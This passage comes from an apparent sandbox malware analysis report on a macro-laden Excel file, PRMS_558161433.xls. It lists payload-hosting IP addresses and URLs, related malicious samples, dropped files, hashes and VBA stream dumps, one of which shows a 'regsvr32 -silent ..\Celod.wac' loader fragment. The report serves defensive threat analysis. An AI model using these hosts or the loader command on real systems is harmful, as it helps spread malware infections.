    • 185.123.53.220/44483.3537556712.dat
    101.99.90.219PRMS_558161433.xlsGet hashmaliciousBrowse
    • 101.99.90.219/44483.3537556712.dat

    Domains

    No context

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    HSAEPRMS_558161433.xlsGet hashmaliciousBrowse
    • 185.244.150.172
    SecuriteInfo.com.Exploit.Siggen3.21227.11912.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Exploit.Siggen3.21227.11912.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.12255.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.17985.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.12255.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.17985.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.21879.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.573.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.21879.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.573.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.16533.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.18564.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.16533.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.18564.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.10164.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.19388.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.10164.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    SecuriteInfo.com.Heur.19388.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    Outstand_93764149.xlsGet hashmaliciousBrowse
    • 185.244.150.138
    TELE-ASTeleAsiaLimitedHKPRMS_558161433.xlsGet hashmaliciousBrowse
    • 185.123.53.220
    Rebate-690835286-10052021.xlsGet hashmaliciousBrowse
    • 185.123.53.199
    Purchase Order.exeGet hashmaliciousBrowse
    • 185.36.81.32
    sm3IX1O9SY.exeGet hashmaliciousBrowse
    • 185.123.53.190
    5X23WRfhRS.exeGet hashmaliciousBrowse
    • 185.123.53.190
    pwa3NHNVZW.exeGet hashmaliciousBrowse
    • 185.123.53.190
    JC1oBQKLeZ.exeGet hashmaliciousBrowse
    • 185.123.53.190
    322e2172b60d694797e91a98109d97e2b167953bb82f8.exeGet hashmaliciousBrowse
    • 185.123.53.190
    CFk8TRCHMR.exeGet hashmaliciousBrowse
    • 185.123.53.190
    krqKjxV4Vu.exeGet hashmaliciousBrowse
    • 185.123.53.190
    gZw5shwW7a.exeGet hashmaliciousBrowse
    • 185.123.53.190
    JC1oBQKLeZ.exeGet hashmaliciousBrowse
    • 185.123.53.190
    llPhlwbDY0.exeGet hashmaliciousBrowse
    • 185.123.53.190
    mHu8YsFcE4.exeGet hashmaliciousBrowse
    • 185.123.53.190
    218ca7b5b0f838d6aa07bfcc350794954804d89d03d1e.exeGet hashmaliciousBrowse
    • 185.123.53.190
    oZy4tc2qRb.exeGet hashmaliciousBrowse
    • 185.123.53.190
    X9s8Bq26D6.exeGet hashmaliciousBrowse
    • 185.123.53.190
    ecXVIbiFXw.exeGet hashmaliciousBrowse
    • 185.123.53.190
    WLER42xEif.exeGet hashmaliciousBrowse
    • 185.123.53.190
    xvDPA3IdQv.exeGet hashmaliciousBrowse
    • 185.123.53.190

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):152056
    Entropy (8bit):4.4143959615710475
    Encrypted:false
    SSDEEP:1536:fmmyfzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3ow:fIc8WpFpKKHHedydFeo+oQLUlPow
    MD5:BC33F4F1FDE137A5AC6610A326BEAF87
    SHA1:BF7CC73871731B22E36E61D931CEE7D2457AB1F4
    SHA-256:E4F4B2A45500C6B011A1B83F7AC8ED48EA9D3DF3043AF93EC794DDA3834E9AA2
    SHA-512:B07F83201790FCC18DB3FD51BBB8F2BACB16FF77FAE90217316145515EB5B3FA389E5E0AEB137AF7C13F0773EDC65F87366457FA1DF234A5B0413DEC0D5C34F3
    Malicious:false
    Reputation:low
    Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......B...........^...............g...............W...............F..............<G...............g...............i...I..............T..................................................................................................
    C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):15040
    Entropy (8bit):4.61073258818073
    Encrypted:false
    SSDEEP:192:3dNxJA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkb:tN78xesT20lheZ3waE5D7qxIxkb
    MD5:F4F4D33E02805F562AFFC509A408EF0F
    SHA1:4A9BA2F426EDB946AFEDD5B8C20727787E58037D
    SHA-256:F080B19B6462297850A9DA07BAE04C8F44BD033200D3E07B064A8E6A9F52C7B2
    SHA-512:4860CAA33542FC1E99D4799F2506AC77EAB0F9362F99B9F5F2EF4ABE5FAAC2A2D19876C05E2D2661F9CC956096FB58876F1E7D8DDAB6F88A93EBE56E4BD3F0BD
    Malicious:false
    Reputation:low
    Preview: MSFT................A...............................1............... ...................d.......P...,...............\...........H...4............... ...........|...............................|...............|...x...............................x...........................................................................................$!...............................................P..................................................$!..87......................................0....P..,.........................0.....................%!...:......................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... .............../~..U.?K.U.M...E.........E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......|...K..a...

    Static File Info

    General

    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Last Saved By: Gretta, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Tue Oct 12 08:41:12 2021, Security: 0
    Entropy (8bit):6.9818260514657595
    TrID:
    • Microsoft Excel sheet (30009/1) 47.99%
    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
    File name:PRMS_558161433.xls
    File size:137728
    MD5:ce9aef0eeccadcb8bbf463e2158e718c
    SHA1:50ed2e5bbe1ac51ae8a26f005f17ba14ef30be88
    SHA256:ad682974afe24641e8f2aa645a02f24bafd8595d6746ad789e4ef351807c6399
    SHA512:f43a45179311a42e6d707bc1b01b87da7449ab4fce931ec119bcb2df5e4686907c2c204668fd715da77cb0bceba6917e9ae957412faaaa3ca90c8d15fb6b8225
    SSDEEP:3072:fk3hOdsylKlgxopeiBNhZFGzE+cL2kdAZc6YehWfG5tUHKGDbpmsiiWbyaBi+RLR:fk3hOdsylKlgxopeiBNhZF+E+W2kdAZL
    File Content Preview:........................>.......................................................b..............................................................................................................................................................................

    File Icon

    Icon Hash:74ecd4c6c3c6c4d8

    Static OLE Info

    General

    Document Type:OLE
    Number of OLE Files:1

    OLE File "PRMS_558161433.xls"

    Indicators

    Has Summary Info:True
    Application Name:Microsoft Excel
    Encrypted Document:False
    Contains Word Document Stream:False
    Contains Workbook/Book Stream:True
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Code Page:1251
    Last Saved By:Gretta
    Create Time:2015-06-05 18:17:20
    Last Saved Time:2021-10-12 07:41:12
    Creating Application:Microsoft Excel
    Security:0

    Document Summary

    Document Code Page:1251
    Thumbnail Scaling Desired:False
    Company:
    Contains Dirty Links:False
    Shared Document:False
    Changed Hyperlinks:False
    Application Version:1048576

    Streams with VBA

    VBA File Name: UserForm2, Stream Size: -1
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2
    VBA File Name:UserForm2
    Stream Size:-1
    Data ASCII:
    Data Raw:
    VBA Code
    VBA File Name: Module1, Stream Size: 2912
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Module1
    VBA File Name:Module1
    Stream Size:2912
    Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 03 f0 00 00 00 5a 04 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 88 04 00 00 80 09 00 00 00 00 00 00 01 00 00 00 fb 18 3d fb 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    VBA File Name: Module2, Stream Size: 2975
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Module2
    VBA File Name:Module2
    Stream Size:2975
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 03 f0 00 00 00 e2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 10 03 00 00 84 09 00 00 00 00 00 00 01 00 00 00 fb 18 75 d6 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    VBA File Name: Module5, Stream Size: 1901
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Module5
    VBA File Name:Module5
    Stream Size:1901
    Data ASCII:. . . . . . . . . B . . . . . . . . . . . . . . . p . . . p . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 03 f0 00 00 00 42 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 70 03 00 00 70 06 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    VBA File Name: Sheet1, Stream Size: 999
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
    VBA File Name:Sheet1
    Stream Size:999
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 01 f0 00 00 00 da 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff e1 02 00 00 35 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    VBA File Name: ThisWorkbook, Stream Size: 3491
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
    VBA File Name:ThisWorkbook
    Stream Size:3491
    Data ASCII:. . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 01 f0 00 00 00 52 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 59 04 00 00 d1 0a 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    VBA File Name: UserForm2, Stream Size: 1189
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
    VBA File Name:UserForm2
    Stream Size:1189
    Data ASCII:. . . . . . . . . ^ . . . . . . . L . . . . . . . e . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 01 f0 00 00 00 5e 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 65 03 00 00 b9 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code

    Streams

    Stream Path: \x1CompObj, File Type: data, Stream Size: 108
    General
    Stream Path:\x1CompObj
    File Type:data
    Stream Size:108
    Entropy:4.18849998853
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
    General
    Stream Path:\x5DocumentSummaryInformation
    File Type:data
    Stream Size:244
    Entropy:2.65175227267
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 184
    General
    Stream Path:\x5SummaryInformation
    File Type:data
    Stream Size:184
    Entropy:3.47815159904
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . P . . . . . . . h . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . G r e t t a . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . R . < . . . . . . . . . . .
    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 88 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 50 00 00 00 0c 00 00 00 68 00 00 00 0d 00 00 00 74 00 00 00 13 00 00 00 80 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00 47 72 65 74 74 61 00 00
    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 102011
    General
    Stream Path:Workbook
    File Type:Applesoft BASIC program data, first line number 16
    Stream Size:102011
    Entropy:7.64896485553
    Base64 Encoded:True
    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . G r e t t a B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V q % : . . . . . . . X . @
    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 06 00 00 47 72 65 74 74 61 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 745
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECT
    File Type:ASCII text, with CRLF line terminators
    Stream Size:745
    Entropy:5.30360451227
    Base64 Encoded:True
    Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 2 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . .
    Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37
    Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECTlk
    File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
    Stream Size:30
    Entropy:1.37215976263
    Base64 Encoded:False
    Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
    Data Raw:01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 164
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
    File Type:data
    Stream Size:164
    Entropy:3.40743696106
    Base64 Encoded:False
    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 2 . M . o . d . u . l . e . 2 . . . . .
    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00
    Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
    File Type:data
    Stream Size:97
    Entropy:3.61064918306
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 257
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
    File Type:ASCII text, with CRLF line terminators
    Stream Size:257
    Entropy:4.65749862826
    Base64 Encoded:True
    Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n e r . . T y p e I n f o V e r = 2 4 . . E n d .
    Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 20 20 33 30 31 35 0d 0a 20 20 20 43 6c 69 65 6e 74 4c 65 66 74 20 20 20 20 20 20 3d 20 20 20 31 32 30 0d 0a
    Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 307
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/f
    File Type:data
    Stream Size:307
    Entropy:3.63476927414
    Base64 Encoded:False
    Data ASCII:. . $ . . . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . C . . ( . . . . . . . . . . . . . 2 . . . 4 . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 4 . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 4 . . . . . . . L a b e l 4 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . P . . . . . . . B l o s t 3 . . .
    Data Raw:00 04 24 00 08 0c 10 0c 0e 00 00 00 ff ff 00 00 18 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 05 00 00 00 e0 00 00 00 00 85 01 43 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 34 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 d4 00 00 00 d4
    Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 296
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/o
    File Type:data
    Stream Size:296
    Entropy:3.31823961076
    Base64 Encoded:False
    Data ASCII:. . . . ( . . . . . . . 1 . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . 2 . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . 3 . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . 0 . ( . . . . . . . r e g s v r 3 2 - s i l e n t . . \\ C e l o d . w a c . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . . . \\ C e l o d
    Data Raw:00 02 14 00 28 00 00 00 01 00 00 80 31 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 14 00 28 00 00 00 01 00 00 80 32 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 14 00 28 00 00 00 01 00 00 80 33 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4944
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
    File Type:data
    Stream Size:4944
    Entropy:4.61842690213
    Base64 Encoded:True
